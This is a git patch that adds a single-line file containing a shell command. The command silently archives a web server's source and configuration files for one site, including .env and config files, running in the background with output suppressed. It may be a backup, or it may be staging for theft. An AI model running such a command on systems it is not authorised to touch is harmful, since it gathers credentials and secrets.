From e16cbe300a92f0fc606eab4816de4100dc786e5e Mon Sep 17 00:00:00 2001 From: "25.11reg" Date: Fri, 27 Mar 2026 07:15:17 +0000 Subject: [PATCH] Add c1 --- c1 | 1 + 1 file changed, 1 insertion(+) create mode 100644 c1 diff --git a/c1 b/c1 new file mode 100644 index 0000000..4ccff33 --- /dev/null +++ b/c1 @@ -0,0 +1 @@ +nohup find /var/www/touchlcdhouse -type f \( -name "*.php" -o -name "*.html" -o -name "*.htm" -o -name "*.js" -o -name "*.json" -o -name "*.xml" -o -name "*.yml" -o -name "*.yaml" -o -name "*.ini" -o -name "*.conf" -o -name ".env" -o -name "*.config" \) -print | tar -czf www.touchlcdhouse.com.tar.gz -T - >/dev/null 2>&1 & \ No newline at end of file